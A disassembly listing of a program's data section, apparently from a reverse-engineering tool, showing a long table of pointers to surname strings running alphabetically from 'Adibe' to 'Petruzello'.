dd offset aAdibe ; "Adibe"
dd offset aAdorno ; "Adorno"
dd offset aAhlers ; "Ahlers"
dd offset aAlavi ; "Alavi"
dd offset aAlcorn ; "Alcorn"
dd offset aAlda ; "Alda"
dd offset aAleks ; "Aleks"
dd offset aAllison ; "Allison"
dd offset aAlongi ; "Alongi"
dd offset aAltavilla ; "Altavilla"
dd offset aAltenberger ; "Altenberger"
dd offset aAltenhofen ; "Altenhofen"
dd offset aAmaral ; "Amaral"
dd offset aAmatangelo ; "Amatangelo"
dd offset aAmeer ; "Ameer"
dd offset aAmsden ; "Amsden"
dd offset aAnand ; "Anand"
dd offset aAndel ; "Andel"
dd offset aAndo ; "Ando"
dd offset aAndrelus ; "Andrelus"
dd offset aAndron ; "Andron"
dd offset aAnfinrud ; "Anfinrud"
dd offset aAnsley ; "Ansley"
dd offset aAnthony ; "Anthony"
dd offset aAntos ; "Antos"
dd offset aArbia ; "Arbia"
dd offset aArduini ; "Arduini"
dd offset aArellano ; "Arellano"
dd offset aAristotle ; "Aristotle"
dd offset aArjas ; "Arjas"
dd offset aArky ; "Arky"
dd offset aAtkins ; "Atkins"
dd offset aAugustus ; "Augustus"
dd offset aAurelius ; "Aurelius"
dd offset aAxelrod ; "Axelrod"
dd offset aAxworthy ; "Axworthy"
dd offset aAyiemba ; "Ayiemba"
dd offset aAykroyd ; "Aykroyd"
dd offset aAyling ; "Ayling"
dd offset aAzima ; "Azima"
dd offset aBachmuth ; "Bachmuth"
dd offset aBackus ; "Backus"
dd offset aBady ; "Bady"
dd offset aBaglivo ; "Baglivo"
dd offset aBagnold ; "Bagnold"
dd offset aBailar ; "Bailar"
dd offset aBakanowsky ; "Bakanowsky"
dd offset aBaleja ; "Baleja"
dd offset aBallatori ; "Ballatori"
dd offset aBallew ; "Ballew"
dd offset aBaltz ; "Baltz"
dd offset aBanta ; "Banta"
dd offset aBarabesi ; "Barabesi"
dd offset aBarajas ; "Barajas"
dd offset aBaranczak ; "Baranczak"
dd offset aBaranowska ; "Baranowska"
dd offset aBarberi ; "Barberi"
dd offset aBarbetti ; "Barbetti"
dd offset aBarneson ; "Barneson"
dd offset aBarnett ; "Barnett"
dd offset aBarriola ; "Barriola"
dd offset aBarry ; "Barry"
dd offset aBartholomew ; "Bartholomew"
dd offset aBartolome ; "Bartolome"
dd offset aBartoo ; "Bartoo"
dd offset aBasavappa ; "Basavappa"
dd offset aBashevis ; "Bashevis"
dd offset aBatchelder ; "Batchelder"
dd offset aBaumiller ; "Baumiller"
dd offset aBayles ; "Bayles"
dd offset aBayo ; "Bayo"
dd offset aBeacon ; "Beacon"
dd offset aBeal ; "Beal"
dd offset aBean ; "Bean"
dd offset aBeckman ; "Beckman"
dd offset aBeder ; "Beder"
dd offset aBedford ; "Bedford"
dd offset aBehenna ; "Behenna"
dd offset aBelanger ; "Belanger"
dd offset aBelaoussof ; "Belaoussof"
dd offset aBelfer ; "Belfer"
dd offset aBelinCollart ; "Belin-Collart"
dd offset aBellavance ; "Bellavance"
dd offset aBellhouse ; "Bellhouse"
dd offset aBellini ; "Bellini"
dd offset aBelloc ; "Belloc"
dd offset aBenedictDye ; "Benedict-Dye"
dd offset aBergson ; "Bergson"
dd offset aBerkeJenkins ; "Berke-Jenkins"
dd offset aBernardo ; "Bernardo"
dd offset aBernassola ; "Bernassola"
dd offset aBernston ; "Bernston"
dd offset aBerrizbeitia ; "Berrizbeitia"
dd offset aBetti ; "Betti"
dd offset aBeynart ; "Beynart"
dd offset aBiagioli ; "Biagioli"
dd offset aBickel ; "Bickel"
dd offset aBinion ; "Binion"
dd offset aBir ; "Bir"
dd offset aBisema ; "Bisema"
dd offset aBisho ; "Bisho"
dd offset aBlackbourn ; "Blackbourn"
dd offset aBlackwell ; "Blackwell"
dd offset aBlagg ; "Blagg"
dd offset aBlakemore ; "Blakemore"
dd offset aBlanke ; "Blanke"
dd offset aBliss ; "Bliss"
dd offset aBlizard ; "Blizard"
dd offset aBloch ; "Bloch"
dd offset aBloembergen ; "Bloembergen"
dd offset aBloemhof ; "Bloemhof"
dd offset aBloxham ; "Bloxham"
dd offset aBlyth ; "Blyth"
dd offset aBolger ; "Bolger"
dd offset aBolick ; "Bolick"
dd offset aBollinger ; "Bollinger"
dd offset aBologna ; "Bologna"
dd offset aBoner ; "Boner"
dd offset aBonham ; "Bonham"
dd offset aBoniface ; "Boniface"
dd offset aBontempo ; "Bontempo"
dd offset aBook ; "Book"
dd offset aBookbinder ; "Bookbinder"
dd offset aBoone ; "Boone"
dd offset aBoorstin ; "Boorstin"
dd offset aBorack ; "Borack"
dd offset aBorden ; "Borden"
dd offset aBossi ; "Bossi"
dd offset aBothman ; "Bothman"
dd offset aBotosh ; "Botosh"
dd offset aBoudin ; "Boudin"
dd offset aBoudrot ; "Boudrot"
dd offset aBourneuf ; "Bourneuf"
dd offset aBowers ; "Bowers"
dd offset aBoxer ; "Boxer"
dd offset aBoyajian ; "Boyajian"
dd offset aBoyes ; "Boyes"
dd offset aBoyland ; "Boyland"
dd offset aBoym ; "Boym"
dd offset aBoyne ; "Boyne"
dd offset aBracalente ; "Bracalente"
dd offset aBradac ; "Bradac"
dd offset aBradach ; "Bradach"
dd offset aBrecht ; "Brecht"
dd offset aBreed ; "Breed"
dd offset aBrenan ; "Brenan"
dd offset aBrennan ; "Brennan"
dd offset aBrewer ; "Brewer"
dd offset aBrewer_0 ; "Brewer"
dd offset aBridgeman ; "Bridgeman"
dd offset aBridges ; "Bridges"
dd offset aBrinton ; "Brinton"
dd offset aBritz ; "Britz"
dd offset aBroca ; "Broca"
dd offset aBrook ; "Brook"
dd offset aBrzycki ; "Brzycki"
dd offset aBuchan ; "Buchan"
dd offset aBudding ; "Budding"
dd offset aBullard ; "Bullard"
dd offset aBunton ; "Bunton"
dd offset aBurden ; "Burden"
dd offset aBurdzy ; "Burdzy"
dd offset aBurke ; "Burke"
dd offset aBurridge ; "Burridge"
dd offset aBusetta ; "Busetta"
dd offset aByatt ; "Byatt"
dd offset aByerly ; "Byerly"
dd offset aByrd ; "Byrd"
dd offset aCage ; "Cage"
dd offset aCalnan ; "Calnan"
dd offset aCammelli ; "Cammelli"
dd offset aCammilleri ; "Cammilleri"
dd offset aCanley ; "Canley"
dd offset aCapanni ; "Capanni"
dd offset aCaperton ; "Caperton"
dd offset aCapocaccia ; "Capocaccia"
dd offset aCapodilupo ; "Capodilupo"
dd offset aCappuccio ; "Cappuccio"
dd offset aCapursi ; "Capursi"
dd offset aCaratozzolo ; "Caratozzolo"
dd offset aCarayannopoulo ; "Carayannopoulos"
dd offset aCarlin ; "Carlin"
dd offset aCarlos ; "Carlos"
dd offset aCarlyle ; "Carlyle"
dd offset aCarmichael ; "Carmichael"
dd offset aCaroti ; "Caroti"
dd offset aCarper ; "Carper"
dd offset aCartmill ; "Cartmill"
dd offset aCascio ; "Cascio"
dd offset aCase ; "Case"
dd offset aCaspar ; "Caspar"
dd offset aCastelda ; "Castelda"
dd offset aCavanagh ; "Cavanagh"
dd offset aCavell ; "Cavell"
dd offset aCeniceros ; "Ceniceros"
dd offset aCerioli ; "Cerioli"
dd offset aChapman ; "Chapman"
dd offset aCharles ; "Charles"
dd offset aCheang ; "Cheang"
dd offset aCherry ; "Cherry"
dd offset aChervinsky ; "Chervinsky"
dd offset aChiassino ; "Chiassino"
dd offset aChien ; "Chien"
dd offset aChildress ; "Childress"
dd offset aChilds ; "Childs"
dd offset aChinipardaz ; "Chinipardaz"
dd offset aChinman ; "Chinman"
dd offset aChristenson ; "Christenson"
dd offset aChristian ; "Christian"
dd offset aChristiano ; "Christiano"
dd offset aChristie ; "Christie"
dd offset aChristopher ; "Christopher"
dd offset aChu ; "Chu"
dd offset aChupasko ; "Chupasko"
dd offset aChurch ; "Church"
dd offset aCiampaglia ; "Ciampaglia"
dd offset aCicero ; "Cicero"
dd offset aCifarelli ; "Cifarelli"
dd offset aClaffey ; "Claffey"
dd offset aClancy ; "Clancy"
dd offset aClark ; "Clark"
dd offset aClement ; "Clement"
dd offset aClifton ; "Clifton"
dd offset aClow ; "Clow"
dd offset aCoblenz ; "Coblenz"
dd offset aCoito ; "Coito"
dd offset aColdren ; "Coldren"
dd offset aColella ; "Colella"
dd offset aCollard ; "Collard"
dd offset aCollis ; "Collis"
dd offset aCompton ; "Compton"
dd offset aCompton_0 ; "Compton"
dd offset aComstock ; "Comstock"
dd offset aConcino ; "Concino"
dd offset aCondodina ; "Condodina"
dd offset aConnors ; "Connors"
dd offset aCorey ; "Corey"
dd offset aCornish ; "Cornish"
dd offset aCosmides ; "Cosmides"
dd offset aCounter ; "Counter"
dd offset aCoutaux ; "Coutaux"
dd offset aCrawford ; "Crawford"
dd offset aCrocker ; "Crocker"
dd offset aCroshaw ; "Croshaw"
dd offset aCroxen ; "Croxen"
dd offset aCroxton ; "Croxton"
dd offset aCui ; "Cui"
dd offset aCurrier ; "Currier"
dd offset aCutler ; "Cutler"
dd offset aCvek ; "Cvek"
dd offset aCyders ; "Cyders"
dd offset aDasilva ; "daSilva"
dd offset aDaldalian ; "Daldalian"
dd offset aDaly ; "Daly"
dd offset aDAmbra ; "D'Ambra"
dd offset aDanieli ; "Danieli"
dd offset aDante ; "Dante"
dd offset aDapice ; "Dapice"
dd offset aDArcangelo ; "D'arcangelo"
dd offset aDas ; "Das"
dd offset aDasgupta ; "Dasgupta"
dd offset aDaskalu ; "Daskalu"
dd offset aDavid ; "David"
dd offset aDawkins ; "Dawkins"
dd offset aDegennaro ; "DeGennaro"
dd offset aDelapena ; "DeLaPena"
dd offset aDelEnclos ; "del'Enclos"
dd offset aDerousse ; "deRousse"
dd offset aDebroff ; "Debroff"
dd offset aDees ; "Dees"
dd offset aDefeciani ; "Defeciani"
dd offset aDelattre ; "Delattre"
dd offset aDeleonRendon ; "Deleon-Rendon"
dd offset aDelger ; "Delger"
dd offset aDellAcqua ; "Dell'acqua"
dd offset aDeming ; "Deming"
dd offset aDempster ; "Dempster"
dd offset aDemusz ; "Demusz"
dd offset aDenault ; "Denault"
dd offset aDenham ; "Denham"
dd offset aDenison ; "Denison"
dd offset aDesombre ; "Desombre"
dd offset aDeutsch ; "Deutsch"
dd offset aDFini ; "D'fini"
dd offset aDicks ; "Dicks"
dd offset aDiefenbach ; "Diefenbach"
dd offset aDifabio ; "Difabio"
dd offset aDifronzo ; "Difronzo"
dd offset aDilworth ; "Dilworth"
dd offset aDionysius ; "Dionysius"
dd offset aDirksen ; "Dirksen"
dd offset aDockery ; "Dockery"
dd offset aDoherty ; "Doherty"
dd offset aDonahue ; "Donahue"
dd offset aDonner ; "Donner"
dd offset aDoonan ; "Doonan"
dd offset aDore ; "Dore"
dd offset aDorf ; "Dorf"
dd offset aDosi ; "Dosi"
dd offset aDoty ; "Doty"
dd offset aDoug ; "Doug"
dd offset aDowsland ; "Dowsland"
dd offset aDrinker ; "Drinker"
dd offset aDSouza ; "D'souza"
dd offset aDuffin ; "Duffin"
dd offset aDurrett ; "Durrett"
dd offset aDussault ; "Dussault"
dd offset aDwyer ; "Dwyer"
dd offset aEardley ; "Eardley"
dd offset aEbeling ; "Ebeling"
dd offset aEckel ; "Eckel"
dd offset aEdley ; "Edley"
dd offset aEdner ; "Edner"
dd offset aEdward ; "Edward"
dd offset aEickenhorst ; "Eickenhorst"
dd offset aEliasson ; "Eliasson"
dd offset aElmendorf ; "Elmendorf"
dd offset aElmerick ; "Elmerick"
dd offset aElvis ; "Elvis"
dd offset aEncinas ; "Encinas"
dd offset aEnyeart ; "Enyeart"
dd offset aEppling ; "Eppling"
dd offset aErbach ; "Erbach"
dd offset aErdman ; "Erdman"
dd offset aErdos ; "Erdos"
dd offset aErez ; "Erez"
dd offset aEspinoza ; "Espinoza"
dd offset aEstes ; "Estes"
dd offset aEtter ; "Etter"
dd offset aEuripides ; "Euripides"
dd offset aEverett ; "Everett"
dd offset aFabbris ; "Fabbris"
dd offset aFagan ; "Fagan"
dd offset aFaioes ; "Faioes"
dd offset aFalcoAcosta ; "Falco-Acosta"
dd offset aFalorsi ; "Falorsi"
dd offset aFaris ; "Faris"
dd offset aFarone ; "Farone"
dd offset aFarren ; "Farren"
dd offset aFasso ; "Fasso'"
dd offset aFates ; "Fates"
dd offset aFeigenbaum ; "Feigenbaum"
dd offset aFejzo ; "Fejzo"
dd offset aFeldman ; "Feldman"
dd offset aFernald ; "Fernald"
dd offset aFernandes ; "Fernandes"
dd offset aFerrante ; "Ferrante"
dd offset aFerriell ; "Ferriell"
dd offset aFeuer ; "Feuer"
dd offset aFido ; "Fido"
dd offset aField ; "Field"
dd offset aFink ; "Fink"
dd offset aFinkelstein ; "Finkelstein"
dd offset aFinnegan ; "Finnegan"
dd offset aFiorina ; "Fiorina"
dd offset aFisk ; "Fisk"
dd offset aFitzmaurice ; "Fitzmaurice"
dd offset aFlier ; "Flier"
dd offset aFlores ; "Flores"
dd offset aFolks ; "Folks"
dd offset aForester ; "Forester"
dd offset aFortes ; "Fortes"
dd offset aFortier ; "Fortier"
dd offset aFossey ; "Fossey"
dd offset aFossi ; "Fossi"
dd offset aFrancisco ; "Francisco"
dd offset aFranklinKenea ; "Franklin-Kenea"
dd offset aFranz ; "Franz"
dd offset aFrazierDavis ; "Frazier-Davis"
dd offset aFreid ; "Freid"
dd offset aFreundlich ; "Freundlich"
dd offset aFried ; "Fried"
dd offset aFriedland ; "Friedland"
dd offset aFrisken ; "Frisken"
dd offset aFrowiss ; "Frowiss"
dd offset aFryberger ; "Fryberger"
dd offset aFrye ; "Frye"
dd offset aFujiiAbe ; "Fujii-Abe"
dd offset aFuller ; "Fuller"
dd offset aFurth ; "Furth"
dd offset aFusaro ; "Fusaro"
dd offset aGabrielli ; "Gabrielli"
dd offset aGaggiotti ; "Gaggiotti"
dd offset aGaleotti ; "Galeotti"
dd offset aGalwey ; "Galwey"
dd offset aGambini ; "Gambini"
dd offset aGarfield ; "Garfield"
dd offset aGarman ; "Garman"
dd offset aGaronna ; "Garonna"
dd offset aGeller ; "Geller"
dd offset aGemberling ; "Gemberling"
dd offset aGeorgi ; "Georgi"
dd offset aGerrett ; "Gerrett"
dd offset aGhorai ; "Ghorai"
dd offset aGibbens ; "Gibbens"
dd offset aGibson ; "Gibson"
dd offset aGilbert ; "Gilbert"
dd offset aGili ; "Gili"
dd offset aGill ; "Gill"
dd offset aGillispie ; "Gillispie"
dd offset aGist ; "Gist"
dd offset aGleason ; "Gleason"
dd offset aGlegg ; "Glegg"
dd offset aGlendon ; "Glendon"
dd offset aGoldfarb ; "Goldfarb"
dd offset aGoncalves ; "Goncalves"
dd offset aGood ; "Good"
dd offset aGoodearl ; "Goodearl"
dd offset aGoody ; "Goody"
dd offset aGozzi ; "Gozzi"
dd offset aGravell ; "Gravell"
dd offset aGreenberg ; "Greenberg"
dd offset aGreenfeld ; "Greenfeld"
dd offset aGriffiths ; "Griffiths"
dd offset aGrigoletto ; "Grigoletto"
dd offset aGrummell ; "Grummell"
dd offset aGruner ; "Gruner"
dd offset aGruppe ; "Gruppe"
dd offset aGuenthart ; "Guenthart"
dd offset aGunn ; "Gunn"
dd offset aGuo ; "Guo"
dd offset aHa ; "Ha"
dd offset aHaar ; "Haar"
dd offset aHackman ; "Hackman"
dd offset aHackshaw ; "Hackshaw"
dd offset aHaley ; "Haley"
dd offset aHalkias ; "Halkias"
dd offset aHallowell ; "Hallowell"
dd offset aHalpert ; "Halpert"
dd offset aHambarzumjan ; "Hambarzumjan"
dd offset aHamer ; "Hamer"
dd offset aHammerness ; "Hammerness"
dd offset aHand ; "Hand"
dd offset aHanssen ; "Hanssen"
dd offset aHarding ; "Harding"
dd offset aHargraves ; "Hargraves"
dd offset aHarlow ; "Harlow"
dd offset aHarrigan ; "Harrigan"
dd offset aHartman ; "Hartman"
dd offset aHartmann ; "Hartmann"
dd offset aHartnett ; "Hartnett"
dd offset aHarwell ; "Harwell"
dd offset aHaviaras ; "Haviaras"
dd offset aHawkes ; "Hawkes"
dd offset aHayes ; "Hayes"
dd offset aHaynes ; "Haynes"
dd offset aHazlewood ; "Hazlewood"
dd offset aHeermans ; "Heermans"
dd offset aHeft ; "Heft"
dd offset aHeiland ; "Heiland"
dd offset aHellman ; "Hellman"
dd offset aHellmiss ; "Hellmiss"
dd offset aHelprin ; "Helprin"
dd offset aHemphill ; "Hemphill"
dd offset aHenery ; "Henery"
dd offset aHenrichs ; "Henrichs"
dd offset aHernandez ; "Hernandez"
dd offset aHerrera ; "Herrera"
dd offset aHester ; "Hester"
dd offset aHeubert ; "Heubert"
dd offset aHeyeck ; "Heyeck"
dd offset aHimmelfarb ; "Himmelfarb"
dd offset aHind ; "Hind"
dd offset aHirst ; "Hirst"
dd offset aHitchcock ; "Hitchcock"
dd offset aHoang ; "Hoang"
dd offset aHock ; "Hock"
dd offset aHoffer ; "Hoffer"
dd offset aHoffman ; "Hoffman"
dd offset aHokanson ; "Hokanson"
dd offset aHokoda ; "Hokoda"
dd offset aHolmes ; "Holmes"
dd offset aHoloien ; "Holoien"
dd offset aHolter ; "Holter"
dd offset aHolway ; "Holway"
dd offset aHolzman ; "Holzman"
dd offset aHooker ; "Hooker"
dd offset aHopkins ; "Hopkins"
dd offset aHorsley ; "Horsley"
dd offset aHoshida ; "Hoshida"
dd offset aHostage ; "Hostage"
dd offset aHottle ; "Hottle"
dd offset aHoward ; "Howard"
dd offset aHoy ; "Hoy"
dd offset aHuey ; "Huey"
dd offset aHuidekoper ; "Huidekoper"
dd offset aHungerford ; "Hungerford"
dd offset aHuntington ; "Huntington"
dd offset aHupp ; "Hupp"
dd offset aHurtubise ; "Hurtubise"
dd offset aHutchings ; "Hutchings"
dd offset aHyde ; "Hyde"
dd offset aIaquinta ; "Iaquinta"
dd offset aIchikawa ; "Ichikawa"
dd offset aIgarashi ; "Igarashi"
dd offset aInamura ; "Inamura"
dd offset aInniss ; "Inniss"
dd offset aIsaac ; "Isaac"
dd offset aIsaievych ; "Isaievych"
dd offset aIsbill ; "Isbill"
dd offset aIsserman ; "Isserman"
dd offset aIyer ; "Iyer"
dd offset aJacenko ; "Jacenko"
dd offset aJackson ; "Jackson"
dd offset aJagers ; "Jagers"
dd offset aJagger ; "Jagger"
dd offset aJagoe ; "Jagoe"
dd offset aJain ; "Jain"
dd offset aJamil ; "Jamil"
dd offset aJanjigian ; "Janjigian"
dd offset aJarnagin ; "Jarnagin"
dd offset aJarrell ; "Jarrell"
dd offset aJay ; "Jay"
dd offset aJeffers ; "Jeffers"
dd offset aJellis ; "Jellis"
dd offset aJenkins ; "Jenkins"
dd offset aJespersen ; "Jespersen"
dd offset aJewett ; "Jewett"
dd offset aJohannesson ; "Johannesson"
dd offset aJohannsen ; "Johannsen"
dd offset aJohns ; "Johns"
dd offset aJolly ; "Jolly"
dd offset aJorgensen ; "Jorgensen"
dd offset aJucks ; "Jucks"
dd offset aJuliano ; "Juliano"
dd offset aJulious ; "Julious"
dd offset aKabbash ; "Kabbash"
dd offset aKaboolian ; "Kaboolian"
dd offset aKafadar ; "Kafadar"
dd offset aKalbfleisch ; "Kalbfleisch"
dd offset aKaligian ; "Kaligian"
dd offset aKalil ; "Kalil"
dd offset aKalinowski ; "Kalinowski"
dd offset aKalman ; "Kalman"
dd offset aKamel ; "Kamel"
dd offset aKangis ; "Kangis"
dd offset aKarpouzes ; "Karpouzes"
dd offset aKassower ; "Kassower"
dd offset aKasten ; "Kasten"
dd offset aKawachi ; "Kawachi"
dd offset aKee ; "Kee"
dd offset aKeenan ; "Keenan"
dd offset aKeepper ; "Keepper"
dd offset aKeith ; "Keith"
off_444C4C dd offset aKelker ; DATA XREF: .data:00454BAC�o
; "Kelker"
dd offset aKelsey ; "Kelsey"
dd offset aKempton ; "Kempton"
dd offset aKemsley ; "Kemsley"
dd offset aKendall ; "Kendall"
dd offset aKerry ; "Kerry"
dd offset aKeul ; "Keul"
dd offset aKhong ; "Khong"
dd offset aKimmel ; "Kimmel"
dd offset aKimmett ; "Kimmett"
dd offset aKimura ; "Kimura"
dd offset aKindall ; "Kindall"
dd offset aKinsley ; "Kinsley"
dd offset aKippenberger ; "Kippenberger"
dd offset aKirscht ; "Kirscht"
dd offset aKittridge ; "Kittridge"
dd offset aKleckner ; "Kleckner"
dd offset aKleiman ; "Kleiman"
dd offset aKleinfelder ; "Kleinfelder"
dd offset aKlemperer ; "Klemperer"
dd offset aKling ; "Kling"
dd offset aKlinkenborg ; "Klinkenborg"
dd offset aKlint ; "Klint"
dd offset aKnuff ; "Knuff"
dd offset aKobrick ; "Kobrick"
dd offset aKoch ; "Koch"
dd offset aKohn ; "Kohn"
dd offset aKoivumaki ; "Koivumaki"
dd offset aKommer ; "Kommer"
dd offset aKoniaris ; "Koniaris"
dd offset aKonrad ; "Konrad"
dd offset aKool ; "Kool"
dd offset aKorzybski ; "Korzybski"
dd offset aKotter ; "Kotter"
dd offset aKovaks ; "Kovaks"
dd offset aKraemer ; "Kraemer"
dd offset aKrailo ; "Krailo"
dd offset aKrasney ; "Krasney"
dd offset aKraus ; "Kraus"
dd offset aKroemer ; "Kroemer"
dd offset aKrysiak ; "Krysiak"
dd offset aKuenzli ; "Kuenzli"
dd offset aKumar ; "Kumar"
dd offset aKusman ; "Kusman"
dd offset aKuwabara ; "Kuwabara"
dd offset aLa ; "La"
dd offset aLabunka ; "Labunka"
dd offset aLafler ; "Lafler"
dd offset aLaing ; "Laing"
dd offset aLallemant ; "Lallemant"
dd offset aLandes ; "Landes"
dd offset aLankes ; "Lankes"
dd offset aLantieri ; "Lantieri"
dd offset aLanzit ; "Lanzit"
dd offset aLaserna ; "Laserna"
dd offset aLashley ; "Lashley"
dd offset aLawless ; "Lawless"
dd offset aLecar ; "Lecar"
dd offset aLecce ; "Lecce"
dd offset aLeclercq ; "Leclercq"
dd offset aLeite ; "Leite"
dd offset aLenard ; "Lenard"
dd offset aLEnclos ; "l'Enclos"
dd offset aLesser ; "Lesser"
dd offset aLessi ; "Lessi"
dd offset aLiakos ; "Liakos"
dd offset aLidano ; "Lidano"
dd offset aLiem ; "Liem"
dd offset aLight ; "Light"
dd offset aLightfoot ; "Lightfoot"
dd offset aLim ; "Lim"
dd offset aLinares ; "Linares"
dd offset aLinda ; "Linda"
dd offset aLinder ; "Linder"
dd offset aLine_0 ; "Line"
dd offset aLinehan ; "Linehan"
dd offset aLinzee ; "Linzee"
dd offset aLippmann ; "Lippmann"
dd offset aLipponen ; "Lipponen"
dd offset aLittle ; "Little"
dd offset aLitvak ; "Litvak"
dd offset aLivernash ; "Livernash"
dd offset aLivi ; "Livi"
dd offset aLivolsi ; "Livolsi"
dd offset aLizardo ; "Lizardo"
dd offset aLocatelli ; "Locatelli"
dd offset aLongworth ; "Longworth"
dd offset aLoss ; "Loss"
dd offset aLoveman ; "Loveman"
dd offset aLowenstein ; "Lowenstein"
dd offset aLoza ; "Loza"
dd offset aLubin ; "Lubin"
dd offset aLucas ; "Lucas"
dd offset aLuciano ; "Luciano"
dd offset aLuczkow ; "Luczkow"
dd offset aLuecke ; "Luecke"
dd offset aLunetta ; "Lunetta"
dd offset aLuoma ; "Luoma"
dd offset aLussier ; "Lussier"
dd offset aLutcavage ; "Lutcavage"
dd offset aLuzader ; "Luzader"
dd offset aMa ; "Ma"
dd offset aMaccormac ; "Maccormac"
dd offset aMacdonald ; "Macdonald"
dd offset aMaceachern ; "Maceachern"
dd offset aMacintyre ; "Macintyre"
dd offset aMackenney ; "Mackenney"
dd offset aMacmillan ; "MacMillan"
dd offset aMacy ; "Macy"
dd offset aMadigan ; "Madigan"
dd offset aMaggio ; "Maggio"
dd offset aMahony ; "Mahony"
dd offset aMaier ; "Maier"
dd offset aMaineHershey ; "Maine-Hershey"
dd offset aMaisano ; "Maisano"
dd offset aMalatesta ; "Malatesta"
dd offset aMaller ; "Maller"
dd offset aMalova ; "Malova"
dd offset aManalis ; "Manalis"
dd offset aMandel ; "Mandel"
dd offset aManganiello ; "Manganiello"
dd offset aMantovan ; "Mantovan"
dd offset aMarch_0 ; "March"
dd offset aMarchbanks ; "Marchbanks"
dd offset aMarcus ; "Marcus"
dd offset aMargalit ; "Margalit"
dd offset aMargetts ; "Margetts"
dd offset aMarques ; "Marques"
dd offset aMartinez ; "Martinez"
dd offset aMartochio ; "Martochio"
dd offset aMarton ; "Marton"
dd offset aMarubini ; "Marubini"
dd offset aMass ; "Mass"
dd offset aMatalka ; "Matalka"
dd offset aMatarazzo ; "Matarazzo"
dd offset aMatsukata ; "Matsukata"
dd offset aMattson ; "Mattson"
dd offset aMauzy ; "Mauzy"
dd offset aMay_0 ; "May"
dd offset aMazzali ; "Mazzali"
dd offset aMazziotta ; "Mazziotta"
dd offset aMcbride ; "Mcbride"
dd offset aMccaffery ; "Mccaffery"
dd offset aMccall ; "Mccall"
dd offset aMcclearn ; "Mcclearn"
dd offset aMcdowell ; "Mcdowell"
dd offset aMcelroy ; "Mcelroy"
dd offset aMcfadden ; "McFadden"
dd offset aMcghee ; "Mcghee"
dd offset aMcgoldrick ; "Mcgoldrick"
dd offset aMcilroy ; "McIlroy"
dd offset aMcintosh ; "Mcintosh"
dd offset aMckenna ; "Mckenna"
dd offset aMclane ; "Mclane"
dd offset aMclaren ; "Mclaren"
dd offset aMcnealy ; "Mcnealy"
dd offset aMcnulty ; "Mcnulty"
dd offset aMeccariello ; "Meccariello"
dd offset aMemisoglu ; "Memisoglu"
dd offset aMenzies ; "Menzies"
dd offset aMerikoski ; "Merikoski"
dd offset aMerlani ; "Merlani"
dd offset aMerminod ; "Merminod"
dd offset aMerseth ; "Merseth"
dd offset aMerz ; "Merz"
dd offset aMetelka ; "Metelka"
dd offset aMetropolis ; "Metropolis"
dd offset aMeurer ; "Meurer"
dd offset aMichelman ; "Michelman"
dd offset aMiddle ; "Middle"
dd offset aMieher ; "Mieher"
dd offset aMills ; "Mills"
dd offset aMinh ; "Minh"
dd offset aMini ; "Mini"
dd offset aMinichiello ; "Minichiello"
dd offset aGonzalez ; "Gonzalez"
dd offset aMitropoulos ; "Mitropoulos"
dd offset aMittal ; "Mittal"
dd offset aMocroft ; "Mocroft"
dd offset aModestino ; "Modestino"
dd offset aMoeller ; "Moeller"
dd offset aMohr ; "Mohr"
dd offset aMoiamedi ; "Moiamedi"
dd offset aMonque ; "Monque"
dd offset aMontilio ; "Montilio"
dd offset aMooredech_ ; "MooreDeCh."
dd offset aMorani ; "Morani"
dd offset aMoreton ; "Moreton"
dd offset aMorrison ; "Morrison"
dd offset aMorrow ; "Morrow"
dd offset aMortimer ; "Mortimer"
dd offset aMosher ; "Mosher"
dd offset aMosler ; "Mosler"
dd offset aMostafavi ; "Mostafavi"
dd offset aMotooka ; "Motooka"
dd offset aMudarri ; "Mudarri"
dd offset aMuello ; "Muello"
dd offset aMugnai ; "Mugnai"
dd offset aMulkern ; "Mulkern"
dd offset aMulroy ; "Mulroy"
dd offset aMumford ; "Mumford"
dd offset aMussachio ; "Mussachio"
dd offset aNaddeo ; "Naddeo"
dd offset aNapolitano ; "Napolitano"
dd offset aNardi ; "Nardi"
dd offset aNardone ; "Nardone"
dd offset aNaviaux ; "Naviaux"
dd offset aNayduch ; "Nayduch"
dd offset aNelson ; "Nelson"
dd offset aNenna ; "Nenna"
dd offset aNesci ; "Nesci"
dd offset aNeuman ; "Neuman"
dd offset aNewfeld ; "Newfeld"
dd offset aNewlin ; "Newlin"
dd offset aNg ; "Ng"
dd offset aNi_0 ; "Ni"
dd offset aNickerson ; "Nickerson"
dd offset aNickoloff ; "Nickoloff"
dd offset aNisenson ; "Nisenson"
dd offset aNitabach ; "Nitabach"
dd offset aNotman ; "Notman"
dd offset aNuzum ; "Nuzum"
dd offset aOcougne ; "Ocougne"
dd offset aOgata ; "Ogata"
dd offset aOh ; "Oh"
dd offset aOHagan ; "O'hagan"
dd offset aOldford ; "Oldford"
dd offset aOlsen ; "Olsen"
dd offset aOlson ; "Olson"
dd offset aOlszewski ; "Olszewski"
dd offset aOMalley ; "O'malley"
dd offset aOman ; "Oman"
dd offset aOMeara ; "O'meara"
dd offset aOpel ; "Opel"
dd offset aOray ; "Oray"
dd offset aOrfield ; "Orfield"
dd offset aOrsi ; "Orsi"
dd offset aOspina ; "Ospina"
dd offset aOstrowski ; "Ostrowski"
dd offset aOttaviani ; "Ottaviani"
dd offset aOtten ; "Otten"
dd offset aOuchida ; "Ouchida"
dd offset aOvid ; "Ovid"
dd offset aPaesdealmeida ; "PaesDealmeida"
dd offset aPaine ; "Paine"
dd offset aPalayoor ; "Palayoor"
dd offset aPalepu ; "Palepu"
dd offset aPallara ; "Pallara"
dd offset aPalmitesta ; "Palmitesta"
dd offset aPanadero ; "Panadero"
dd offset aPanizzon ; "Panizzon"
dd offset aPantilla ; "Pantilla"
dd offset aPaoletti ; "Paoletti"
dd offset aParmeggiani ; "Parmeggiani"
dd offset aParris ; "Parris"
dd offset aPartridge ; "Partridge"
dd offset aPascucci ; "Pascucci"
dd offset aPatefield ; "Patefield"
dd offset aPatrick ; "Patrick"
dd offset aPattullo ; "Pattullo"
dd offset aPavetti ; "Pavetti"
dd offset aPavlon ; "Pavlon"
dd offset aPawloski ; "Pawloski"
dd offset aPaynter ; "Paynter"
dd offset aPeabody ; "Peabody"
dd offset aPearlberg ; "Pearlberg"
dd offset aPederson ; "Pederson"
dd offset aPeishel ; "Peishel"
dd offset aPenny ; "Penny"
dd offset aPereira ; "Pereira"
dd offset aPerko ; "Perko"
dd offset aPerlak ; "Perlak"
dd offset aPerlman ; "Perlman"
dd offset aPerna ; "Perna"
dd offset aPerone ; "Perone"
dd offset aPerrimon ; "Perrimon"
dd offset aPeters ; "Peters"
dd offset aPetruzello ; "Petruzello"
